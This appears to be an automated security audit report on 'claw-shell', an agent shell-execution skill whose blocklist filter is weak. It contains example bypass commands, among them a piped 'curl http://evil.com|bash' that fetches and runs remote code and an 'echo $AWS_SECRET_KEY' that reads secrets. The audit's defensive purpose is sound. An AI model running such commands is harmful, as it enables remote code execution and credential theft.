安全决策报告
claw-shell
Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.
最直接的威胁证据
高危 代码执行
Unrestricted shell execution with weak safety controls The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.
handler.js:18 为什么得出这个结论
1/4 个维度触发 通过
声明与实际能力
声明资源与推断能力基本一致。
复核
隐藏执行与外联
提取到 1 个一般风险产物,需要结合上下文判断。
阻止
攻击链与高危发现
报告包含 0 步攻击链,另有 1 项高危或严重发现。
复核
依赖与供应链卫生
没有完整依赖信息,供应链判断需要保留弹性。
风险分是怎么被拉高的
Unrestricted shell execution via execSync +20
Full shell access is powerful and declared, but safety measures are minimal
Weak blocklist-based safety filter +15
Filter can be bypassed with variations like 'rmdir', symlinks, or 'curl http://evil.com|bash'
No timeout on execSync +8
Commands could hang or consume excessive resources
Single-character command variations bypass filter +5
'sudo' variations, 'DD' uppercase, embedded commands could slip through
最关键的证据
高危 代码执行
Unrestricted shell execution with weak safety controls
The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.
handler.js:18 Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.
中危 代码执行
Dangerous commands bypass filter
Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com|bash' are not blocked by the current filter.
handler.js:18 Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.
中危 敏感访问
Indirect environment variable access
While not explicitly accessing environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY'
handler.js:14 Consider sanitizing commands that query environment variables or restrict to specific paths.
低危 代码执行
No command timeout configured
execSync calls have no timeout specified, allowing commands to hang indefinitely.
handler.js:29 Add timeout option to execSync calls.
声明能力 vs 实际能力
命令执行 通过
声明 WRITE
→ 推断 WRITE
execSync used in handler.js:1,7,10 文件系统 通过
声明 WRITE
→ 推断 WRITE
Shell can execute any file operation 网络访问 通过
声明 WRITE
→ 推断 WRITE
Shell can execute curl/wget/netcat 环境变量 通过
声明 NONE
→ 推断 READ
Shell commands can read $ENV vars 剪贴板 通过
声明 NONE
→ 推断 NONE
— 浏览器 通过
声明 NONE
→ 推断 NONE
— 数据库 通过
声明 NONE
→ 推断 NONE
— 可疑产物与外联
中危 外部 URL
https://x.com/... SKILL.md:39
依赖与供应链
没有结构化依赖告警。
文件构成
3 个文件 · 106 行
JavaScript 1 个文件 · 57 行Markdown 1 个文件 · 44 行JSON 1 个文件 · 5 行
需关注文件 · 2
handler.js Unrestricted shell execution with weak safety controls · Dangerous commands bypass filter · Indirect environment variable access · No command timeout configured
SKILL.md https://x.com/...
其他文件 · _meta.json
安全亮点
Purpose and capabilities are clearly documented in SKILL.md
Uses dedicated tmux session 'claw' for isolation
Basic safety filter exists for clearly dangerous commands
No hidden functionality or obfuscation detected
No credential harvesting or data exfiltration observed
Single-purpose tool with focused functionality